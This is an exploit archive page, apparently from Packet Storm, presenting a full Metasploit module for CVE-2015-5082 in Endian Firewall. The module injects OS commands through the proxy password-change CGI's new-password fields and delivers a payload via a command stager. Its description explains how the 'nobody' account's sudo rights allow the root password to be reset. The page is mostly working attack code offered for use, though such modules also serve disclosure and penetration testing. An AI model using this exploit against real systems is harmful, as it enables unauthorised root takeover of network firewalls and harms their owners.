exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Endian Firewall Proxy Password Change Command Injection

Endian Firewall Proxy Password Change Command Injection
Posted Sep 7, 2015
Authored by Ben Lincoln | Site metasploit.com

This Metasploit module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd (which changes the password for the Linux root account on the system to the value specified by console input once it is executed). The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth credentials as well to exploit this vulnerability. Use the USERNAME and PASSWORD advanced options to specify these values if required. Versions >= 3.0.0 still contain the vulnerable code, but it appears to never be executed due to a bug in the vulnerable CGI script which also prevents normal use (http://jira.endian.com/browse/UTM-1002). Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug (http://bugs.endian.com/print_bug_page.php?bug_id=3083). Tested successfully against the following versions of EFW Community: 1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2. Should function against any version from 1.1 RC5 to 2.2.x, as well as 2.4.1 and 2.5.x.

tags | exploit, web, local, cgi, root, php
systems | linux
advisories | CVE-2015-5082
SHA-256 | 93595333575588a0761fd710896979bd064097e42ff0603d14d9ecebcedd6cff

Endian Firewall Proxy Password Change Command Injection

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'Endian Firewall Proxy Password Change Command Injection',
'Description' => %q{
This module exploits an OS command injection vulnerability in a
web-accessible CGI script used to change passwords for locally-defined
proxy user accounts. Valid credentials for such an account are
required.

Command execution will be in the context of the "nobody" account, but
this account had broad sudo permissions, including to run the script
/usr/local/bin/chrootpasswd (which changes the password for the Linux
root account on the system to the value specified by console input
once it is executed).

The password for the proxy user account specified will *not* be
changed by the use of this module, as long as the target system is
vulnerable to the exploit.

Very early versions of Endian Firewall (e.g. 1.1 RC5) require
HTTP basic auth credentials as well to exploit this vulnerability.
Use the USERNAME and PASSWORD advanced options to specify these values
if required.

Versions >= 3.0.0 still contain the vulnerable code, but it appears to
never be executed due to a bug in the vulnerable CGI script which also
prevents normal use (http://jira.endian.com/browse/UTM-1002).

Versions 2.3.x and 2.4.0 are not vulnerable because of a similar bug
(http://bugs.endian.com/print_bug_page.php?bug_id=3083).

Tested successfully against the following versions of EFW Community:

1.1 RC5, 2.0, 2.1, 2.2, 2.5.1, 2.5.2.

Should function against any version from 1.1 RC5 to 2.2.x, as well as
2.4.1 and 2.5.x.
},
'Author' => [
'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module
],
'References' => [
['CVE', '2015-5082'],
['URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082'],
['EDB', '37426'],
['EDB', '37428']
],
'Privileged' => false,
'Platform' => %w{ linux },
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'Space' => 2048
},
'Targets' =>
[
[ 'Linux x86',
{
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => [ :echo, :printf ]
}
],
[ 'Linux x86_64',
{
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => [ :echo, :printf ]
}
]
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 10443
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 28 2015',
'License' => MSF_LICENSE
))

register_options([
OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script',
'/cgi-bin/chpasswd.cgi']),
OptString.new('EFW_USERNAME', [true,
'Valid proxy account username for the target system']),
OptString.new('EFW_PASSWORD', [true,
'Valid password for the proxy user account']),
OptString.new('RPATH', [true,
'Target PATH for binaries used by the CmdStager', '/bin'])
], self.class)

register_advanced_options(
[
OptInt.new('HTTPClientTimeout', [ true, 'HTTP read response timeout (seconds)', 5])
], self.class)

end

def exploit
# Cannot use generic/shell_reverse_tcp inside an elf
# Checking before proceeds
if generate_payload_exe.blank?
fail_with(Failure::BadConfig,
"#{peer} - Failed to store payload inside executable, " +
"please select a native payload")
end

execute_cmdstager(:linemax => 200, :nodelete => true)
end

def execute_command(cmd, opts)
cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")

req(cmd)
end

def req(cmd)
sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};"

post_data = Rex::MIME::Message.new
post_data.add_part('change', nil, nil, 'form-data; name="ACTION"')
post_data.add_part(datastore['EFW_USERNAME'], nil, nil, 'form-data; name="USERNAME"')
post_data.add_part(datastore['EFW_PASSWORD'], nil, nil, 'form-data; name="OLD_PASSWORD"')
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_1"')
post_data.add_part(sploit, nil, nil, 'form-data; name="NEW_PASSWORD_2"')
post_data.add_part(' Change password', nil, nil, 'form-data; name="SUBMIT"')

data = post_data.to_s
boundary = post_data.bound

referer_url =
"https://#{datastore['RHOST']}:#{datastore['RPORT']}" +
"#{datastore['TARGETURI']}"


res = send_request_cgi(
{
'method' => 'POST',
'uri' => datastore['TARGETURI'],
'ctype' => "multipart/form-data; boundary=#{boundary}",
'headers' => {
'Referer' => referer_url
},
'data' => data
})

if res
if res.code == 401
fail_with(Failure::NoAccess,
"#{rhost}:#{rport} - Received a 401 HTTP response - " +
"specify web admin credentials using the USERNAME " +
"and PASSWORD advanced options to target this host.")
end
if res.code == 404
fail_with(Failure::Unreachable,
"#{rhost}:#{rport} - Received a 404 HTTP response - " +
"your TARGETURI value is most likely not correct")
end
end

end

end
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close